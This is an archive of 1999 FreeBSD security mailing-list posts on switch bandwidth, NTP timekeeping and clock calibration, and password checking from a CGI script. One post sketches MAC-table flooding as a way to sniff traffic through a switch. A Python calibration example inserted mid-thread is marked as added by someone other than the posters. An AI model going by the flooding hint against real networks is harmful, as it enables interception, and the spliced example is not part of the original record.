From owner-freebsd-security Sun Aug 22 0:15:46 1999
Date: Sun, 22 Aug 1999 00:13:25 -0700 (PDT)
From: Matthew Dillon
Message-Id: <199908220713.AAA76633@apollo.backplane.com>
To: "Rodney W. Grimes"
Cc: cdillon@wolves.k12.mo.us (Chris Dillon), wes@softweyr.com (Wes Peters), cliff@steam.com (Cliff Skolnick), service_account@yahoo.com (jay d), yurtesen@ispro.net.tr (Evren Yurtesen), freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network
References: <199908220649.XAA31700@gndrsh.dnsmgr.net>

:> I noticed the only "L3 support" from the spec sheets of the 4000M and
:> 8000M is IGMP snooping to control multicast traffic, and "protocol
:> filtering" only on the 8000M. Nothing close to IP routing, however
:...
:> with only a 3.8Gbit backplane, unless local switching occurs on each
:> of the port modules, and even then the "throughput test" would have to
:...
:
:...
:4Gbit/sec of backplane to do this. That's 4G bytes of data in, 4G
:across the backplane, and 4G back out of the box.
:
:...
:As you can see the Fabric only has to handle 40 x 100Mb/s to
:keep all 40 ports busy at full duplex.
:
:The 3.8 Gb/s spec comes up a little short, but only by 2 ports...
:and it had better be darned efficient as far as overhead goes...
:--
:Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net

One thing I've learned about switches: by the time you actually use up the backplane bandwidth of a cheapish switch you are already spending so much money on the hardware connected to the thing that the cost of upgrading the switch itself is in the noise.

The second thing I've learned: unless your needs are highly specialized, you aren't going to even come close to the potential aggregate bandwidth of N ports. At BEST we had several Catalysts - 150+ ports on each one, for customer colo and for all of our web servers & shell machines. I don't think any of those babies ever used more than 500 MBits of aggregate bandwidth across the fabric.

In regards to all the discussions about security and so forth... well, all I can say to that is that it's easy for one to get worked up into a frenzy over network security. You have much less stress when you simply assume that the network is always compromised. Then you can concentrate your time securing the machines and using only encrypted network links, which is what you should have been doing in the first place. Any hacker who can bypass a simple switch also has a fairly good chance of working around a more sophisticated one, even if you nail the MAC addresses down and take every precaution you can think of. To my mind that means that it makes sense to take basic precautions (e.g. use a switch instead of a hub), but if you get too far beyond that you start to waste money on tiny incremental improvements. Some people might get some peace of mind by throwing lots of money into hardware, but it gives a false sense of security.
-Matt
Matthew Dillon

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Aug 22 0:38:45 1999
Date: Sun, 22 Aug 1999 17:38:28 +1000
From: Bruce Evans
Message-Id: <199908220738.RAA28514@godzilla.zeta.org.au>
To: ben@scientia.demon.co.uk, gjb-freebsd@gba.oz.au
Subject: Re: Securelevel 3 ant setting time
Cc: freebsd-security@FreeBSD.ORG

>> If you happen to have a machine that needs its regular tweaks by
>> ntpdate to exceed half a second, then you can adjust the kernel
>> tick a few units either side of its default setting of 10000 so
>> that things stay relatively stable.
>
>Where should I change this? I tried changing the value in

You shouldn't. The kernel variable `tick' is not used for timekeeping in FreeBSD. It is only used for determining select timeouts and related low precision things.

>/sys/conf/param.c (after copying it to the compile directory) and
>it seems to have had no effect. I changed it to 9997, I calculated

Change the frequency of the active timecounter to closer to its actual frequency using `sysctl -w ...'. The hardware timecounters and their frequencies can be found using `sysctl -a | grep _freq'. The currently active timecounter can be found and changed in -current only using `sysctl [-w] kern.timecounter.hardware'.
Bruce

From owner-freebsd-security Sun Aug 22 4:07:31 1999
Message-ID: <37BF9D25.539C689F@loso.dyndns.com>
Date: Sun, 22 Aug 1999 13:48:05 +0700
From: Note
To: freebsd-security@FreeBSD.ORG

which

From owner-freebsd-security Sun Aug 22 4:44:08 1999
Message-ID: <19990822080909.6389.qmail@alice.gba.oz.au>
Date: Sun, 22 Aug 1999 18:09:09 +1000
From: Greg Black
To: Poul-Henning Kamp
Cc: Will Andrews, Brett Glass, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time
References: <6639.935186801@critter.freebsd.dk>
In-reply-to: <6639.935186801@critter.freebsd.dk> of Sat, 21 Aug 1999 00:06:41 +0200

Poul-Henning Kamp writes:

> >Just as a bit of extra information, xntpd is useless for small
> >networks that don't have constant connectivity to time servers.
>
> Not any longer with ntpv4...

FreeBSD-3.2-release comes with version 3 which makes this not entirely useful. Will version 4 be part of the 3.3 release?

-- Greg Black --

From owner-freebsd-security Sun Aug 22 4:44:10 1999
Message-ID: <19990822082316.6456.qmail@alice.gba.oz.au>
Date: Sun, 22 Aug 1999 18:23:15 +1000
From: Greg Black
To: sthaug@nethelp.no
Cc: andrews@TECHNOLOGIST.COM, brett@lariat.org, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time
References: <19990820214657.1605.qmail@alice.gba.oz.au> <50744.935188518@verdi.nethelp.no>
In-reply-to: <50744.935188518@verdi.nethelp.no> of Sat, 21 Aug 1999 00:35:18 +0200

sthaug@nethelp.no writes:

> > It may be worth noting that timed
> > is much smaller and uses much less CPU than xntpd.
>
> That's probably true - but on today's systems it's also for the most
> part completely irrelevant.

No it's not irrelevant. FreeBSD proclaims that it can run happily on old slow hardware. It can. But not by wasting resources for long-running daemons. And, no matter how fast your hardware, it is still desirable that programs that run from boot to shutdown not waste memory or CPU. It doesn't really matter on a modern system if gcc is a pig since it's used in a transient manner. But it does matter if the daemons are pigs.

> On a P-166 here an xntpd process which has
> been running for 27 days has used all of 255 CPU seconds (ie. something
> like 0.01%). It has a RSS of 476 kByte.

I re-started all my timed processes 135 hours ago because of a change in network topology. Since then, the FreeBSD versions have used less than half a second of CPU which is more than 100 times less than you show for xntpd. And on the old 486-33 which is the server, the CPU has only clocked up a few seconds.
-- Greg Black --

From owner-freebsd-security Sun Aug 22 4:44:15 1999
Message-ID: <19990822112923.6666.qmail@alice.gba.oz.au>
Date: Sun, 22 Aug 1999 21:29:22 +1000
From: Greg Black
To: Jon Hamilton
Cc: Will Andrews, Brett Glass, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time
References: <19990821031948.09B2B1D@woodstock.monkey.net>
In-reply-to: <19990821031948.09B2B1D@woodstock.monkey.net> of Fri, 20 Aug 1999 22:19:48 EST

Jon Hamilton writes:

> } Just as a bit of extra information, xntpd is useless for small
> } networks that don't have constant connectivity to time servers.
>
> Absolutely untrue. There's value in keeping a group of machines
> synchronized to _each other_, regardless of whether they're also
> synchronized to the correct time.

It may well be useful to *some* people to maintain a bunch of machines with the wrong time, but it's utterly useless to me and, I'm certain, to lots of other people.
> It is true that _for some purposes_
> xntpd isn't all that useful in an intermittently-connected scenario,

And one of those purposes would be keeping the clocks on the machines close to the correct time, something that should be (and is) easy to do with the appropriate tools.

> but that doesn't render it completely devoid of any value.

I could say that the QIC-150 tape drive in my gateway machine is useful because it fills in the gaping hole that would otherwise disfigure the front of the machine's case, but the fact that it doesn't perform what I consider to be its primary function (that of writing data onto tapes) makes it useless in my terms. The same goes for xntpd in the scenario that I mentioned.

-- Greg Black --

From owner-freebsd-security Sun Aug 22 4:44:20 1999
Message-ID: <19990822114115.6730.qmail@alice.gba.oz.au>
Date: Sun, 22 Aug 1999 21:41:14 +1000
From: Greg Black
To: Ben Smithurst
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time
References: <19990820214657.1605.qmail@alice.gba.oz.au> <19990821171004.A24337@lithium.scientia.demon.co.uk>
In-reply-to: <19990821171004.A24337@lithium.scientia.demon.co.uk> of Sat, 21 Aug 1999 17:10:04 +0100

Ben Smithurst writes:

> > If you happen to have a machine that needs its regular tweaks by
> > ntpdate to exceed half a second, then you can adjust the kernel
> > tick a few units either side of its default setting of 10000 so
> > that things stay relatively stable.
>
> Where should I change this? I tried changing the value in
> /sys/conf/param.c (after copying it to the compile directory) and
> it seems to have had no effect. I changed it to 9997, I calculated
> this as the best value given that my machine's clock seems to gain
> about 1 second per hour. The clock still seems to be running fast,
> according to the adjustments made by ntpdate. The new value shows up in
> kern.clockrate so I must have got something right.
>
> root@scientia:/sys/compile/SCIENTIA# sysctl kern.clockrate
> kern.clockrate: { hz = 100, tick = 9997, tickadj = 5, profhz = 1024, stathz = 128 }

The way I would do this is to stop ntpdate (and any other time adjusting things) from operating while I was playing with the tick value. Then just run the machine for 24 hours and see how far it drifts. Make an adjustment to tick and go for another 24 hours. Keep going until it stays within half a second of the right time. Then go back to regular corrections with ntpdate and all will be well.

I haven't ever done this on a FreeBSD machine. The only machine that I use as a time server that needed tweaking was an old 486 running BSD/OS. BSDI provide a tickadj program with the ntp tools which can adjust the tick value on a running kernel, and I have a call to it in the /etc/rc on that machine. But it seems to tweak the same thing as you have found. Here's its sysctl output:

kern.clockrate: hz = 100, tick = 9997, profhz = 100, stathz = 100

That machine only gets to run ntpdate once a day and it rarely requires an adjustment of greater than 300 ms and never greater than 500 ms.
-- Greg Black --

From owner-freebsd-security Sun Aug 22 4:48:20 1999
To: Greg Black
Cc: Will Andrews, Brett Glass, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time
In-reply-to: Your message of "Sun, 22 Aug 1999 18:09:09 +1000." <19990822080909.6389.qmail@alice.gba.oz.au>
Date: Sun, 22 Aug 1999 13:46:05 +0200
Message-ID: <3243.935322365@critter.freebsd.dk>
From: Poul-Henning Kamp

In message <19990822080909.6389.qmail@alice.gba.oz.au>, Greg Black writes:
>Poul-Henning Kamp writes:
>
>> >Just as a bit of extra information, xntpd is useless for small
>> >networks that don't have constant connectivity to time servers.
>>
>> Not any longer with ntpv4...
>
>FreeBSD-3.2-release comes with version 3 which makes this not
>entirely useful. Will version 4 be part of the 3.3 release?

no.

--
Poul-Henning Kamp FreeBSD coreteam member
phk@FreeBSD.ORG "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!
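Added example (mine, not code from Greg Black, Bruce Evans, Ben Smithurst or anyone else in the thread): the "stop ntpdate, run for 24 hours, see how far it drifts, adjust" procedure Greg describes above, worked through in Python with the figures Ben gave (hz=100, tick=10000, a clock gaining about 1 s per hour), and the same drift turned into the timecounter-frequency correction Bruce recommends instead of touching tick. It also shows why the two knobs are not equivalent: tick can only move in whole microseconds, which at hz=100 is a 100 ppm step, whereas the counter frequency moves in 1 Hz steps. The i8254 nominal rate of 1193182 Hz and the sysctl name machdep.i8254_freq are assumptions about Ben's machine, not facts stated in the thread; the 0.5 s budget is the figure Greg uses.

```python
"""Tick / timecounter calibration from a measured drift.

Added example, not code from any of the posters.  Works through the
"run it uncorrected for a day and see how far it drifts" procedure and
compares the two knobs discussed in the thread: the 4.4BSD/BSD-OS `tick`
value and the FreeBSD timecounter frequency.  Assumptions (not stated in
the thread): the timecounter is the i8254 at its nominal 1193182 Hz and
its sysctl is machdep.i8254_freq.
"""


def drift_ratio(gain_s: float, elapsed_s: float) -> float:
    """Fraction by which the local clock runs fast (negative: slow).

    gain_s is how far ahead of true time the clock is after elapsed_s
    seconds with no corrections applied (the offset you measure at the
    end of the uncorrected run, positive if the local clock is ahead).
    """
    return gain_s / elapsed_s


def corrected_tick(tick_us: int, d: float) -> int:
    """4.4BSD-style fix: hardclock() adds `tick` microseconds per clock
    interrupt.  If time gains by ratio d, each real interrupt interval is
    tick/(1+d) microseconds, so that, rounded to a whole microsecond (the
    only granularity `tick` has), is the value to install."""
    return round(tick_us / (1.0 + d))


def corrected_freq(freq_hz: int, d: float) -> int:
    """FreeBSD timecounter fix: time = counter / freq.  Gaining by ratio d
    means the counter really runs at freq*(1+d); tell the kernel that."""
    return round(freq_hz * (1.0 + d))


def residual_ppm_tick(tick_us: int, new_tick: int, d: float) -> float:
    """Drift left over after installing new_tick, in parts per million."""
    true_interval_us = tick_us / (1.0 + d)
    return (new_tick / true_interval_us - 1.0) * 1e6


def residual_ppm_freq(freq_hz: int, new_freq: int, d: float) -> float:
    """Drift left over after installing new_freq, in parts per million."""
    true_freq = freq_hz * (1.0 + d)
    return (true_freq / new_freq - 1.0) * 1e6


def seconds_per_day(ppm: float) -> float:
    return ppm * 86400.0 / 1e6


def calibration_plan(gain_s: float, elapsed_s: float, tick_us: int = 10000,
                     freq_hz: int = 1193182, budget_s: float = 0.5) -> dict:
    """Both corrections, plus whether a once-a-day ntpdate would then stay
    inside budget_s (the half second Greg Black aims for)."""
    d = drift_ratio(gain_s, elapsed_s)
    new_tick = corrected_tick(tick_us, d)
    new_freq = corrected_freq(freq_hz, d)
    tick_left = seconds_per_day(residual_ppm_tick(tick_us, new_tick, d))
    freq_left = seconds_per_day(residual_ppm_freq(freq_hz, new_freq, d))
    return {
        "drift_ppm": d * 1e6,
        "tick": new_tick,
        "tick_residual_s_per_day": tick_left,
        "tick_within_budget": abs(tick_left) <= budget_s,
        "freq": new_freq,
        "freq_residual_s_per_day": freq_left,
        "freq_within_budget": abs(freq_left) <= budget_s,
        # assumed sysctl name; confirm with `sysctl -a | grep _freq` first
        "sysctl": f"sysctl -w machdep.i8254_freq={new_freq}",
    }


if __name__ == "__main__":
    # Ben's machine: about 1 s gained per hour, measured over one day.
    for key, value in calibration_plan(gain_s=24.0, elapsed_s=86400.0).items():
        print(f"{key:>24}: {value}")
```

With Ben's numbers the plan comes out at tick=9997, which is exactly what he computed, but the rounding leaves about 22 ppm, or roughly 1.9 s per day, so a daily ntpdate would still be outside the half-second budget; the frequency correction (1193513 Hz here) leaves well under a tenth of a second per day. Take the measurement with every time daemon stopped, as Greg says, or the daemon's own slewing gets counted as drift.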
From owner-freebsd-security Sun Aug 22 8:57:41 1999
Date: Sun, 22 Aug 1999 09:57:31 -0600 (MDT)
From: Colin Eric Johnson
To: freebsd-security@freebsd.org
Subject: getting passwored data via a perl cgi

I'm in the process of writing a cgi script in perl that should verify people against the machine's password file. The problem that I am running into is that if the script is run by anyone other than root I get an empty encrypted password field. I don't want to run the cgi SUID root as this doesn't seem safe. Is there a way to allow other users access to the complete password database? I understand, basically, why this is restricted but I'm not sure how else to solve this given FreeBSD's restrictions.

thanks

Colin E. Johnson | colinj@unm.edu | http://www.unm.edu/~colinj/
Parker always felt things in his bones because, he said, it saved space.
-Steven Ayelett, _The Crime Studio_

From owner-freebsd-security Sun Aug 22 11:36:35 1999
Date: Sun, 22 Aug 1999 13:36:01 -0500 (CDT)
From: Chris Dillon
To: "Rodney W. Grimes"
Cc: Wes Peters, Cliff Skolnick, jay d, Evren Yurtesen, freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network
In-Reply-To: <199908220649.XAA31700@gndrsh.dnsmgr.net>

On Sat, 21 Aug 1999, Rodney W. Grimes wrote:

> > On Sat, 21 Aug 1999, Wes Peters wrote:
> >
> > > You obviously didn't follow the links. The HP ProCurve I mentioned is $1880
> > > for 40 switched 10/100 ports with layer 3 functionality and VLAN support.
> > > That's $47 per port, much lower than your $250/port, with a LOT more performance
> > > also. The Tolly Group recently tested it and found it capable of sustaining
> > > full wire speed on all 40 ports. I'll just bet your PCI-bus box isn't going
> > > to hit 4 Gbps throughput.
> >
> > I noticed the only "L3 support" from the spec sheets of the 4000M and
> > 8000M is IGMP snooping to control multicast traffic, and "protocol
> > filtering" only on the 8000M. Nothing close to IP routing, however
> > (not that you said it did, specifically, just clarifying).
> > When the Tolly Group said they could "sustain full wire speed on all 40 ports",
> > was that testing each one at a time or all at once? My math isn't
> > quite warped enough to allow 40 100Mbit/FD ports to all be saturated
> > with only a 3.8Gbit backplane, unless local switching occurs on each
> > of the port modules, and even then the "throughput test" would have to
> > take that into account and not try to move too much data across the
> > backplane.
>
> You're making a common mistake here when an ``ALL PORTS FULL LOAD'' test
> is done, if you have 40 ports all being sent data at 100MB/sec that
> data is going to have to come out on 40 ports someplace, so you only need
> 4Gbit/sec of backplane to do this. That's 4G bytes of data in, 4G
> across the backplane, and 4G back out of the box.

DOH. I knew better, I just didn't have my head screwed on straight. However, only half of the expansion slots are filled and already you are able to saturate the backplane. Add a couple of gigabit ports and it makes it much easier to do.

> The 3.8 Gb/s spec comes up a little short, but only by 2 ports...
> and it had better be darned efficient as far as overhead goes...

Only by 2 ports until you add even more ports. :-)

Regardless, the switch still looks like an extremely good buy.

--
Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net
FreeBSD: The fastest and most stable server OS on the planet.
For Intel x86 and Alpha architectures (SPARC under development).
( http://www.freebsd.org )

"One should admire Windows users. It takes a great deal of courage to trust Windows with your data."
From owner-freebsd-security Sun Aug 22 12:42:37 1999
To: Greg Black
Cc: Will Andrews, Brett Glass, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time
In-reply-to: Your message of "Sun, 22 Aug 1999 21:29:22 +1000." <19990822112923.6666.qmail@alice.gba.oz.au>
Date: Sun, 22 Aug 1999 14:41:40 -0500
From: Jon Hamilton
Message-Id: <19990822194140.623D211@woodstock.monkey.net>

In message <19990822112923.6666.qmail@alice.gba.oz.au>, Greg Black wrote:
} Jon Hamilton writes:
}
} > } Just as a bit of extra information, xntpd is useless for small
} > } networks that don't have constant connectivity to time servers.
} >
} > Absolutely untrue. There's value in keeping a group of machines
} > synchronized to _each other_, regardless of whether they're also
} > synchronized to the correct time.
}
} It may well be useful to *some* people to maintain a bunch of
} machines with the wrong time, but it's utterly useless to me
} and, I'm certain, to lots of other people.

Because it's useless to you does not make it useless in general.
} > It is true that _for some purposes_
} > xntpd isn't all that useful in an intermittently-connected scenario,
}
} And one of those purposes would be keeping the clocks on the
} machines close to the correct time, something that should be
} (and is) easy to do with the appropriate tools.
}
} > but that doesn't render it completely devoid of any value.
}
} I could say that the QIC-150 tape drive in my gateway machine is
} useful because it fills in the gaping hole that would otherwise
} disfigure the front of the machine's case, but the fact that it
} doesn't perform what I consider to be its primary function (that
} of writing data onto tapes) makes it useless in my terms. The
} same goes for xntpd in the scenario that I mentioned.

But it doesn't; xntpd can still be used to keep your time accurate. Others have pointed out several possibilities, including:

- keeping a local clock as a stratum (say) 8 reference, and synching to a lower stratum clock when available.
- connecting to a local clock via serial port
- some people don't care about "the" correct time, as long as their machines all agree about what they _think_ the time is (e.g. to keep NFS happy on an internal network)

Just because you don't like xntpd or because you don't feel it fits your needs does not mean it's useless, it simply means that you think it's useless for your situation. Please stop pretending that the way your environment functions is the only way _anyone's_ environment functions. All the world's not your back yard.
--
Jon Hamilton hamilton@pobox.com

From owner-freebsd-security Sun Aug 22 13:56:36 1999
Date: Sun, 22 Aug 1999 22:34:15 +0200
From: Ollivier Robert
To: freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time
Message-ID: <19990822223415.A11240@keltia.freenix.fr>
References: <19990822080909.6389.qmail@alice.gba.oz.au> <3243.935322365@critter.freebsd.dk>
In-Reply-To: <3243.935322365@critter.freebsd.dk>; from Poul-Henning Kamp on Sun, Aug 22, 1999 at 01:46:05PM +0200

According to Poul-Henning Kamp:
> no.

It is perfectly understandable when taking into account the time we have before the release but I'd like to see it in 4.0. Or, if we don't want to jump to ntpd, at least upgrade the ancient version we have...

--
Ollivier ROBERT -=- FreeBSD: The Power to Serve!
-=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999

From owner-freebsd-security Sun Aug 22 13:56:42 1999
Date: Sun, 22 Aug 1999 22:36:19 +0200
From: Ollivier Robert
To: freebsd-security@freebsd.org
Subject: Re: getting passwored data via a perl cgi
Message-ID: <19990822223619.B11240@keltia.freenix.fr>
In-Reply-To: ; from Colin Eric Johnson on Sun, Aug 22, 1999 at 09:57:31AM -0600

According to Colin Eric Johnson:
> Is there a way to allow other users access to the complete password database?
> I understand, basically, why this is restricted but I'm not sure how else
> to solve this given FreeBSD's restrictions.

Either you make it setuid root or you wipe up a daemon that runs as root and make your script discuss with the daemon. The daemon could cache entries for example (although pwd lookups should be fast thanks to the DB files).

--
Ollivier ROBERT -=- FreeBSD: The Power to Serve!
-=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999

From owner-freebsd-security Sun Aug 22 14:09:35 1999
Date: Sun, 22 Aug 1999 22:08:32 +0100
From: Josef Karthauser
To: Bigby Findrake
Cc: jay d, "Rodney W. Grimes", Evren Yurtesen, freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network
Message-ID: <19990822220832.A70149@pavilion.net>
References: <19990820192825.15974.rocketmail@web601.yahoomail.com>
In-Reply-To: ; from Bigby Findrake on Fri, Aug 20, 1999 at 12:46:28PM -0700

On Fri, Aug 20, 1999 at 12:46:28PM -0700, Bigby Findrake wrote:
> On Fri, 20 Aug 1999, jay d wrote:
>
> > What you really want is a VLAN capable switch. VLAN switches simply
> > designate what ports on a switch can see what other ports on the same
> > switch. I have to correct you though, Rodney, as sniffing is currently
> > possible through switches.
>
> Please, do tell us how it's possible to sniff through switches.

A switch only switches when it knows where the destination MAC addresses live.
Most switches only have a fixed size table of MAC addresses, so if you could somehow flood this table with bogus entries the switch would broadcast packets to destinations that it can't locate. The rest is an exercise for the reader, (although not on _my_ network please ;)

Joe

--
Josef Karthauser       FreeBSD: How many times have you booted today?
Technical Manager      Viagra for your server (http://www.uk.freebsd.org)
Pavilion Internet plc. [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk]

From owner-freebsd-security Sun Aug 22 14:46:15 1999
Date: Sun, 22 Aug 1999 16:47:24 -0400 (EDT)
From: Bill Fumerola
To: Chris Dillon
Cc: Wes Peters, Cliff Skolnick, Bigby Findrake, jay d, "Rodney W. Grimes", Evren Yurtesen, freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network

On Sun, 22 Aug 1999, Chris Dillon wrote:

> Gotcha I've found by looking at the specs is that it only has a
> 3.8Gbit/sec backplane. This is only enough to keep 19 100mbit ports
> saturated at full duplex, but you're also paying less money for this
> 40-port switch than most other halfway-decent 24-port switches. I
> wonder if local switching takes place on each of the "blades"
> (expansion modules).
> I still think it's worth the money even with the
> limited backplane.

That's more backplane than my (more expensive) baystack 450s can handle.

--
- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp -
- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org -

From owner-freebsd-security Sun Aug 22 17:18:23 1999
From: "Rodney W. Grimes"
Message-Id: <199908230017.RAA33539@gndrsh.dnsmgr.net>
Subject: Re: getting passwored data via a perl cgi
In-Reply-To: <19990822223619.B11240@keltia.freenix.fr> from Ollivier Robert at "Aug 22, 1999 10:36:19 pm"
To: roberto@keltia.freenix.fr (Ollivier Robert)
Date: Sun, 22 Aug 1999 17:17:58 -0700 (PDT)
Cc: freebsd-security@FreeBSD.ORG

> According to Colin Eric Johnson:
> > Is there a way to allow other users access to complete password database?
> > I understand, basically, why this is restricted but I'm not sure how else
> > to solve this given FreeBSD's restrictions.
>
> Either you make it setuid root or you wipe up a daemon that runs as root and

wip?

> make your script discuss with the daemon. The daemon could cache entries for
> example (although pwd lookups should be fast thanks to the DB files).

You can find a program used by cyrus for just what you are trying to do in
ports/mail/cyrus, it's called pwcheck. There are probably some others
around, this is just one that I ran across recently.

IMHO making your cgi script suid root would be asking for a security
breach some day, probably sooner than later. Cyrus is a large daemon, but
it took this route for dealing with this problem for good reasons.

--
Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Sun Aug 22 18:44:19 1999
Date: Mon, 23 Aug 1999 00:58:24 +0100
From: Ben Smithurst
To: Bruce Evans
Cc: gjb-freebsd@gba.oz.au, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time
Message-ID: <19990823005824.A464@lithium.scientia.demon.co.uk>
References: <199908220738.RAA28514@godzilla.zeta.org.au>
In-Reply-To: <199908220738.RAA28514@godzilla.zeta.org.au>

Bruce Evans wrote:
> Change the frequency of active timecounter to closer to its actual
> frequency using `sysctl -w ...'. The hardware timecounters and their
> frequencies can be found using `sysctl -a | grep _freq'.
> The currently
> active timecounter can be found and changed in -current only using
> `sysctl [-w] kern.timecounter.hardware'.

Thanks for the info. After adjusting that, my clock now gained just 16ms
in 70 minutes. Quite an improvement over 1s in one hour, but I'll continue
to tweak it.

--
Ben Smithurst            | PGP: 0x99392F7D
ben@scientia.demon.co.uk |      key available from keyservers and
                         |      ben+pgp@scientia.demon.co.uk

From owner-freebsd-security Sun Aug 22 18:51:21 1999
Message-ID: <37C0A90E.D5452A10@softweyr.com>
Date: Sun, 22 Aug 1999 19:51:10 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Chris Dillon
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network

Chris Dillon wrote:
>
> On Sat, 21 Aug 1999, Wes Peters wrote:
>
> > You obviously didn't follow the links. The HP ProCurve I mentioned is $1880
> > for 40 switched 10/100 ports with layer 3 functionality and VLAN support.
> > That's $47 per port, much lower than your $250/port, with a LOT more performance
> > also. The Tolly Group recently tested it and found it capable of sustaining
> > full wire speed on all 40 ports. I'll just bet your PCI-bus box isn't going
> > to hit 4 Gbps throughput.
>
> I noticed the only "L3 support" from the spec sheets of the 4000M and
> 8000M is IGMP snooping to control multicast traffic, and "protocol
> filtering" only on the 8000M. Nothing close to IP routing, however
> (not that you said it did, specifically, just clarifying).

That's why the price is so much "better" than the 24-port OmniStack. The
OS4024 does L2 switching, L3 routing for IP and IPX, supports RIPv1 routing
protocols, DHCP redirection, L3 authentication, etc., etc., etc.

> When the
> Tolly Group said they could "sustain full wire speed on all 40 ports",
> was that testing each one at a time or all at once? My math isn't
> quite warped enough to allow 40 100Mbit/FD ports to all be saturated
> with only a 3.8Gbit backplane, unless local switching occurs on each
> of the port modules, and even then the "throughput test" would have to
> take that into account and not try to move too much data across the
> backplane.

I'd have to go find the article again. The vendors have an interesting
role in some of these tests, where they have the Tolly Group verify some
of the claims the vendors make. In this case, the Tolly Group is basically
performing an audit of the test results. They could have concocted a test
they know the switch will pass and then have Tolly just verify the switch
does indeed do what they say it does in all the fine print. In this case,
it would seem it would have to be a half-duplex test at the very least.

> You may also notice that the HP ProCurve 9304M and 9308M Routing
> Switches (these DO have IP/IPX routing, but they certainly aren't
> cheap... nice kit, BTW), bear an uncanny resemblance in both looks,
> specs, and a digit of their model name to the Foundry Networks BigIron
> 4000 and 8000, respectively.

My experience has been you have to be careful whom you OEM to in this
industry, lest they decide they want ALL of your equipment painted their
color. It's been pretty good for Xylanders so far. At least the new color
isn't beige. (Ack!)
--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                  Softweyr LLC
http://softweyr.com/                                     wes@softweyr.com

From owner-freebsd-security Sun Aug 22 18:57: 4 1999
Message-ID: <37C0AA66.FD70C73C@softweyr.com>
Date: Sun, 22 Aug 1999 19:56:54 -0600
From: Wes Peters
Organization: Softweyr LLC
To: "Rodney W. Grimes"
Cc: Chris Dillon, Cliff Skolnick, jay d, Evren Yurtesen, freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network
References: <199908220649.XAA31700@gndrsh.dnsmgr.net>

"Rodney W. Grimes" wrote:
>
> You're making a common mistake here when an ``ALL PORTS FULL LOAD'' test
> is done, if you have 40 ports all being sent data at 100MB/sec that
> data is going to have to come out on 40 ports someplace, so you only need
> 4Gbit/sec of backplane to do this. That's 4G bytes of data in, 4G
> across the backplane, and 4G back out of the box.
>
> Maybe a drawing would help:
>
>   rxpair of port 1 >   +---------+ > txpair of port n
>   rxpair of port 2 >   |         |   ....
>   rxpair of port 3 >   |  Fabric | > txpair of port 3
>         ...            |         | > txpair of port 2
>   rxpair of port n >   +---------+ > txpair of port 1
>
> As you can see the Fabric only has to handle 40 x 100Mb/s to
> keep all 40 ports busy at full duplex.
>
> The 3.8 Gb/s spec comes up a little short, but only by 2 ports...
> and it had better be darned efficient as far as overhead goes...
>
> Allowing the port cards to short circuit bridge (and every switch
> chip set I have looked at does this) makes it easy to pass this
> test, in fact you can do it with 0 load on the backplane. My
> drawing above tends to put the maximal load on a switch's backplane,
> but unless the vendor tells you exactly how they tested the benchmark
> is like any other benchmark without all the nitty gritty details,
> total sales and marketing propaganda.

That's what I said to Chris, only I said it a little nicer. I have to,
since I'm part of that industry. ;^)

To paraphrase Mark Twain: "There are 3 kinds of lies: lies, damned lies,
and benchmarks."

On the OS4024 we were discussing, it wouldn't matter which port pairs you
picked, because they're all on the same NI - the 4024 is basically a
single Network Interface built into a shrunken chassis. If the traffic is
all in the same VLAN, it will only get to the "backplane" once, to the
source learning process. After that, the packets will always be switched
on the NI. Performance then becomes a matter of efficient buffering.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                  Softweyr LLC
http://softweyr.com/                                     wes@softweyr.com

From owner-freebsd-security Sun Aug 22 19: 6:17 1999
From: "Crist J. Clark"
Message-Id: <199908230206.WAA24192@cc942873-a.ewndsr1.nj.home.com>
Subject: Re: getting passwored data via a perl cgi
In-Reply-To: from Colin Eric Johnson at "Aug 22, 99 09:57:31 am"
To: colinj@cs.unm.edu (Colin Eric Johnson)
Date: Sun, 22 Aug 1999 12:49:10 -0400 (EDT)
Reply-To: cjclark@home.com

Colin Eric Johnson wrote,
>
> I'm in the process of writing a cgi script in perl that should verify
> people against the machine's password file. The problem that I am running
> into is that if the script is run by anyone other than root I get an
> empty encrypted password field.
>
> I don't want to run the cgi SUID root as this doesn't seem safe.
>
> Is there a way to allow other users access to complete password database?
> I understand, basically, why this is restricted but I'm not sure how else
> to solve this given FreeBSD's restrictions.

Not sure if this is the preferred way to go but... I worked around a
problem like this in a shell script by executing su. IIRC, I did something
like,

    if su $USERNAME -c :; then
        .
        .
Provided you have not redirected stdout or stdin, the person executing the
script gets prompted for 'Password:' and it is fed to su which does the
verification for you. su will only exit on success if the password is
correct and the user has login capabilities.

--
Crist J. Clark                           cjclark@home.com

From owner-freebsd-security Sun Aug 22 19:32:46 1999
